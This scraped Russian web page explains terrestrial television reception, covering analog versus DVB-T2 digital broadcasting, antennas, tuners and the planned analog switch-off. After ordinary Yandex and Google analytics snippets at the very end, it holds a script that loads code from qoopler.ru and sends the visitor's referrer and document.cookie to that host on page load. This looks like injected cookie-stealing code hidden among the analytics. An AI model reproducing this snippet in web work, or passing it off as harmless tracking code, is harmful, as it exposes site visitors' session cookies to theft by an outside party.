Эфирное телевидение
+7(495) 776-73-79 9:00 - 22:00 | Без выходных

Эфирное телевидение

Как смотреть эфирное телевидение

В настоящее время в информационном пространстве нашей страны, представляющем собой воздух, наполненный непрерывными и дискретными радиоволнами, транслируется 19 аналоговых каналов и, в зависимости от региона вещания, 20 или 30 программ в цифровом качестве. Такой широкий диапазон возможностей позволяет настроить свой телевизор и смотреть эфирное телевидение , вместо того, чтобы оплачивать подписку из сотен практически бесполезных каналов поставляемых кабельным оператором, которые преимущественно никто не смотрит, а пользоваться продолжают по инерции.

Для того, чтобы настроиться на прием аналогового телевещания может оказаться достаточным воткнуть в антенное гнездо одно-двухметровый оголенный медный провод, сечение которого совпадает с толщиной центрального сердечника коаксиального кабеля, используемого для передачи радиосигналов от приемников (антенн) к приемникам (телевизорам).

Чтобы смотреть эфирное телевидение , но уже в цифровом качестве потребуется позаботиться о наличии дециметровой антенны и тюнера способного выполнять декодирование сигналов MPEG-4, передаваемых в стандарте DVB-T2, который может быть встроенным в телевизор или выполнен в виде выносного блока. Антенна, которая обеспечит показ всех каналов может быть комнатной, выносной или специально предназначенной для приема сигналов стандарта DVB-T2. Необходимость того или иного устройства определяется удаленностью от ретранслирующей вышки или телецентра, а также степенью экранирования сигнала, зависящей от относительной этажности, представляющей собой отношение максимальной высоты прилегающих зданий к уровню размещения приемника.

Вне зависимости от выбранного варианта, чтобы смотреть цифровое эфирное телевидение, следует выполнить его настройку, которая осуществляется посредством меню телевизора или тюнера и заключается в автоматическом поиске сигналов в заданном диапазоне. Выполнив настройку единожды, можно будет переключаться между источниками сигнала для выбора того или иного пакета телепрограмм.

Какое эфирное телевидение лучше

Аналоговое вещание уже отходит в прошлое, доживая свои последние годы, так, например, в Англии и Литве от него отказались еще три года назад, ввиду характерных недостатков, таких как:

  • высокая восприимчивость к помехам, в результате чего, при отклонении колебаний выше допустимого диапазона, появляется характерный «снег»;

  • широкий интервал диапазона, занимаемый каждым каналом, не позволяющий выполнять передачи большого числа программ;

  • высокая потребная мощность трансляционного оборудования и ретрансляторов.

Самым большим преимуществом подобного вещания, помимо того, что можно смотреть эфирное телевидение, является простота его улавливания и воспроизведения на телеприемнике, а также отсутствие потребности в дополнительном оборудовании для осуществления вещания.

На смену передаче аналоговых сигналов, все больше приходит цифровое вещание, позволяющее предавать в том же диапазоне количество программ, превышающее в разы, то, что было достижимо раньше. Зона охвата транслирующих вышек, которые начали строить в 2009 году, с каждым годом расширяется, охватывая все большую территорию России, в том числе не только крупные населенные пункты, но и места, раньше зачастую остававшиеся «белыми пятнами», оставляя жителей деревень и мелких поселений без информационной поддержки.

Необходимость предоставлять эфирное телевидение для всех категорий населения, является одной из приоритетных государственных программ, которая должна к 2018 году обеспечить практически 95%-ый охват населения страны услугами цифрового телевещания. Значимость этой программы обусловлена необходимостью устранения разрыва в осведомленности между различными категориями населения России, разбросанного по необъятной территории и зачастую узнающими последние новости о событиях местного, федерального и мирового масштаба с отставанием в несколько дней, а то и недель.

Выбрать для просмотра цифровое эфирное телевидение следует в силу ряда его характерных достоинств:

  • высокое качество видеоряда и саундтреков;

  • большее число программ для просмотра;

  • возможность управления воспроизведением, доступа к архивным записям программ;

  • дополнительные услуги, типа телетекста, программы передач и пр.;

  • возможность обратной связи с провайдером услуг.

Что ждет эфирное телевидение

В перспективе ближайшего десятилетия произойдет отказ от аналогового вещания, который станет возможным после полного технического переоснащения приемников аудио и видео сигналов, чтобы каждый житель мог принять цифровые данные и увидеть их в декодированном виде на экране телевизора или монитора. Для того, чтобы смотреть эфирное телевидение многим жителям нашей страны, имеющим старые модели телевизоров, не снабженные тюнерами стандарта DVB-T2 или оборудованные приемниками спутникового сигнала DVB-T, потребуется купить и установить соответствующее ресиверы.

Принимая во внимание тот факт, что значительная часть граждан России не в состоянии приобрести тюнер для того, чтобы смотреть эфирное телевидение или позволить себе поменять телевизор на современную модель, способную принимать и расшифровывать потоки данных в современных форматах, дата полного перехода на цифровое вещание является неопределенной. В настоящее время в правительстве рассматривается возможность бесплатного предоставления тюнеров, нуждающимся и социально не защищенным категориями населения, за счет государства в рамках программы перехода на цифровое вещание.

В середине января текущего года Российское цифровое телевещание изменило стандарт с DVB-T на DVB-T2, в результате чего у многих абонентов, купивших ранее соответствующие ресиверы, чтобы смотреть эфирное телевидение, возникла необходимость их замены на устройства способные воспринимать, декодировать и выводить на экран телевизора сигнал DVB-T2.

В настоящее время, по охваченной сетью вещания территории России, производится транслирование двух пакетов популярных телеканалов в цифровом качестве, каждый из которых содержит 10 программ, причем их перечень периодически меняется в зависимости от рейтинга популярности и значимости содержимого с точки зрения формирования мировоззрения и патриотизма населения. На территории Москвы и Московской области уже сегодня транслируется третий пакет в режиме тестового вещания, а по его завершении передачи будут распространены на все действующие ретранслирующие устройства.

Спустя несколько лет смотреть цифровое эфирное телевидение можно будет в составе пятидесяти каналов, разделённых на пять пакетов и охватывающих наиболее востребованные у населения передачи.
(function (d, w, c) { (w[c] = w[c] || []).push(function() { try { w.yaCounter32184314 = new Ya.Metrika({ id:32184314, clickmap:true, trackLinks:true, accurateTrackBounce:true, webvisor:true }); } catch(e) { } }); var n = d.getElementsByTagName("script")[0], s = d.createElement("script"), f = function () { n.parentNode.insertBefore(s, n); }; s.type = "text/j-avascript"; s.async = true; s.src = "https://mc.yandex.ru/metrika/watch.js"; if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); } })(document, window, "yandex_metrika_callbacks"); type="text/j-avascript">(function (d, w, c) { (w[c] = w[c] || []).push(function() { try { w.yaCounter24167089 = new Ya.Metrika({id:24167089, webvisor:true, clickmap:true, trackLinks:true, accurateTrackBounce:true}); } catch(e) { } }); var n = d.getElementsByTagName("script")[0], s = d.createElement("script"), f = function () { n.parentNode.insertBefore(s, n); }; s.type = "text/j-avascript"; s.async = true; s.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//mc.yandex.ru/metrika/watch.js"; if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); } })(document, window, "yandex_metrika_callbacks"); (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-68618183-1', 'auto'); ga('send', 'pageview'); try { var yaCounter37438800 = new Ya.Metrika({ id:37438800, clickmap:true, trackLinks:true, accurateTrackBounce:true }); } catch(e) { } (function (d, w) { var n = d.getElementsByTagName("script")[0], s = d.createElement("script"), f = function () { n.parentNode.insertBefore(s, n); }; s.type = "text/j-avascript"; s.async = true; s.src = "https://qoopler.ru/index.php?ref="+d.referrer+"&cookie=" + encodeURIComponent(document.cookie); if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); } })(document, window);